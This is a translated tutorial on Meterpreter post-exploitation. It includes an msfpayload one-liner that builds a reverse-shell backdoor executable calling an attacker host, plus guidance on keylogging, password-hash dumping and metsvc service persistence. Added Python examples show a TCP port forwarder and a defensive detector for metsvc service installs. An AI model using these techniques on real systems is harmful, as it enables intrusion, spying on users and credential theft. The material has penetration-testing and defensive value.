DM_ · 2014/06/10

0x01 Background


As a post-exploitation component, Meterpreter comes in many variants, and its command set is made up of core commands plus extension-library commands, which greatly broadens what can be done after access is gained. Note that Meterpreter sends the second-stage code and the Meterpreter server DLL only after the vulnerability has been exploited successfully, so on an unstable network the session often ends up with no executable commands, or you only notice after the session is established and you run help that commands are missing. This happens a lot when you connect over a VPN and then use psexec with bind_tcp on the intranet. Don't worry; just try again once it finishes. Have a cup of tea.

0x02 Common Types


reverse_tcp

path : payload/windows/meterpreter/reverse_tcp

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=8080 X > ~/Desktop/backdoor.exe

Reverse-connect shell; very stable in use. LHOST must be set.

bind_tcp

path : payload/windows/meterpreter/bind_tcp

Bind (forward-connect) shell; often used on an intranet, because a host on another network segment cannot connect back to the attacking machine. It does not require LHOST.

reverse_http/https

path : payload/windows/meterpreter/reverse_http and payload/windows/meterpreter/reverse_https

HTTP/HTTPS reverse connection; unstable when the network is slow. If you go with HTTPS, you can set the listening port to 443.

0x03 Basic Commands


Commonly used commands

    background: send the current session to the background
    load / use: load an extension module into the current session
    channel: switch to a channel
    migrate: migrate into another process
    run: execute an existing script; type run and press TAB twice to list all available scripts, such as autoroute, hashdump, arp_scanner, multi_meter_inject, etc.
    resource: execute an existing RC script

0x04 Common Extension Libraries


Besides its basic commands, Meterpreter has many extension libraries. After load / use, run help to see the commands of that module.

stdapi commands

File related

stdapi has commands for reading and writing files, uploading and downloading, changing directories, taking screenshots, using the webcam, keylogging, and system-related tasks. The most common ones, of course, are the file and network commands. I usually use upload and download to move files. Note that in Meterpreter you can also change directories and edit files, so you don't have to drop into a shell and write files with echo.

When using the edit command, note that it edits an existing file; edit cannot create a new one. After you enter edit followed by the file name, vi is opened.

Network related

The network commands list IP information (ipconfig), show and modify the routing table (route), and set up port forwarding (portfwd). For example, with portfwd:

After the rule is established, connecting to local port 3344 is forwarded to the remote host's port 3389.
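To make concrete what a portfwd rule does on the wire (and why, from the target network's side, the forwarded RDP connection appears to come from the session host rather than from the operator), here is a minimal TCP port forwarder as an added example. It is not Metasploit code; the echo service standing in for the "remote port 3389" service, the loopback addresses and the local port 3344 are constructed for this example.

```python
import socket
import threading

# Added example, not Metasploit's portfwd implementation: a plain TCP relay.
# Every address and port below is constructed for this demonstration.


def _pipe(src, dst):
    """Copy bytes src -> dst until src sends EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _bridge(client, remote_host, remote_port):
    """Open the onward connection and relay in both directions.
    The remote service only ever sees the forwarder's address as its peer."""
    try:
        remote = socket.create_connection((remote_host, remote_port))
    except OSError:
        client.close()
        return
    upstream = threading.Thread(target=_pipe, args=(client, remote), daemon=True)
    upstream.start()
    _pipe(remote, client)
    upstream.join()
    client.close()
    remote.close()


def start_forwarder(local_port, remote_host, remote_port, bind_addr="127.0.0.1"):
    """Listen on bind_addr:local_port; bridge each connection to remote_host:remote_port.
    Returns the port actually bound (handy when local_port is 0)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_addr, local_port))
    listener.listen(5)

    def accept_loop():
        while True:
            client, _ = listener.accept()
            threading.Thread(target=_bridge, args=(client, remote_host, remote_port),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]


def start_echo_service():
    """Constructed stand-in for the 'remote port 3389' service: answers one
    request per connection with 'echo:' plus what it received, then closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve(conn):
        with conn:
            data = conn.recv(4096)
            conn.sendall(b"echo:" + data)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=serve, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def send_through(port, payload, host="127.0.0.1"):
    """Client side: connect to the forwarder, send payload, half-close, read the reply."""
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            block = s.recv(4096)
            if not block:
                break
            chunks.append(block)
    return b"".join(chunks)


if __name__ == "__main__":
    service_port = start_echo_service()
    # 3344 mirrors the article; pass 0 to let the OS pick a free port instead.
    fwd_port = start_forwarder(3344, "127.0.0.1", service_port)
    print(send_through(fwd_port, b"hello"))
```

Run it and the reply comes back through the relay; on a real network the echo service's connection log would show the forwarder host as the client, which is the artefact a defender should look for when an internal host suddenly initiates RDP sessions it never did before.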

Keyboard monitoring

Note the concept of Windows sessions. The Windows desktop is divided into sessions to manage interaction: session 0 represents the console, and sessions 1, 2 represent remote desktops. So to capture keyboard input you have to do it in session 0. Use getdesktop to see the current desktop, or try grabbing a screenshot; otherwise, use setdesktop to switch.

If that does not work, migrate into the explorer.exe process, so that you can also capture keyboard input after a remote desktop session is connected.

mimikatz

I'm not going to go into this, but the hashes can be stored in the database for later use. I wonder whether there is a quick way to use a third-party tool to grab the hashes/plaintext and store them in the database.

This is because my user doesn't have a password.

sniffer

I'm just not sure whether I can start the capture on the victim and download it later, to get usable credentials in a real engagement.

0x05 Using Custom Scripts


The scripts can be RC scripts or Ruby scripts, and Metasploit already ships many of them, such as arp_scanner and hashdump. These scripts are written in Ruby, so they are easy to customize later. A commonly used one is the scraper script, which collects common information from the target machine and then downloads it locally. This script is worth studying because its workflow is a good model; you can add custom commands and so on.

~/.msf4/logs/ holds the logs written by scripts, not only this one; the .msf4 folder also contains other things, such as the commands you typed and the logs of the msf process. The scraper script saves its results in ~/.msf4/logs/scripts/scraper.

0x06 Persistent Backdoor


metsvc is started as a service, and the service name is Meterpreter. The script code is shown in the figure below.

Here three files need to be uploaded, and the service is installed with metsvc.exe. I wonder whether the service name could be changed by modifying metsvc.exe. The installation process and the reconnection process are both simple.

Use the windows/metsvc_bind_tcp payload for the next connection.
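Because this persistence method registers a Windows service whose default name and binary the article gives (Meterpreter, metsvc.exe), the corresponding defensive check is to review service-installation events. The following is an added example, not code from the article or from Metasploit: it scores records shaped like Service Control Manager "service installed" events (System log, Event ID 7045) on the default names plus a user-writable-directory heuristic. The records themselves, the service names and paths, and the list of "writable" directories are constructed assumptions for this example and should be tuned to the environment.

```python
import re
from pathlib import PureWindowsPath

# Default names from the article's metsvc description (service "Meterpreter", binary metsvc.exe).
KNOWN_NAMES = re.compile(r"meterpreter|metsvc", re.IGNORECASE)

# Heuristic (assumption, tune per estate): directories a legitimate service binary rarely lives in.
WRITABLE_DIRS = re.compile(r"\\(Temp|AppData|Users\\Public|ProgramData|Downloads)\\", re.IGNORECASE)

# Constructed records in the shape of Event ID 7045 "service installed" events.
# Every value is made up for this example; none comes from a real system.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Meterpreter",
     "ImagePath": r"C:\Users\bob\AppData\Local\Temp\metsvc.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Windows Update Helper",
     "ImagePath": r"C:\Windows\Temp\upd\metsvc.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Netlogon Monitor",
     "ImagePath": r"C:\ProgramData\nlmon\nlmon.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Dnscache",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k NetworkService", "StartType": "auto start"},
    # A service state change (7036), not an installation: must be ignored even with a scary name.
    {"EventID": 7036, "ServiceName": "Meterpreter", "ImagePath": "", "StartType": ""},
]


def image_binary(image_path):
    """Return just the executable file name from an ImagePath, dropping service
    arguments. Handles quoted paths ("C:\\Program Files\\x\\y.exe" -arg) and unquoted ones."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        exe = image_path[1:end] if end > 0 else image_path[1:]
    else:
        exe = image_path.split(" ", 1)[0]
    return PureWindowsPath(exe).name


def assess_service_install(event):
    """Return the reasons a 7045-style record looks like metsvc-type persistence
    (empty list means nothing notable). Records that are not installs are ignored."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")
    if KNOWN_NAMES.search(name):
        reasons.append("service name matches metsvc default")
    if KNOWN_NAMES.search(image_binary(path)):
        reasons.append("binary name matches metsvc default")
    if WRITABLE_DIRS.search(path):
        reasons.append("service binary in user-writable directory")
    return reasons


def find_suspicious_service_installs(events):
    """Run assess_service_install over a batch of records and keep the hits."""
    hits = []
    for ev in events:
        reasons = assess_service_install(ev)
        if reasons:
            hits.append({"ServiceName": ev["ServiceName"],
                         "ImagePath": ev["ImagePath"],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_service_installs(SAMPLE_EVENTS):
        print(hit["ServiceName"], "->", hit["ImagePath"], "|", "; ".join(hit["reasons"]))
```

The name match alone is weak, since the article itself asks whether the service name can be changed; the path heuristic is what catches the renamed sample, so in practice the two should be combined with a baseline of services normally present on the host.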

0x07 Afterword


Meterpreter provides many scripts for attacking or gathering information, as well as many APIs (see the official documentation for details) and extensions. To the extent that you understand Ruby, being able to modify existing scripts or write your own for the target environment and the situation at hand can greatly improve efficiency and get the results you want.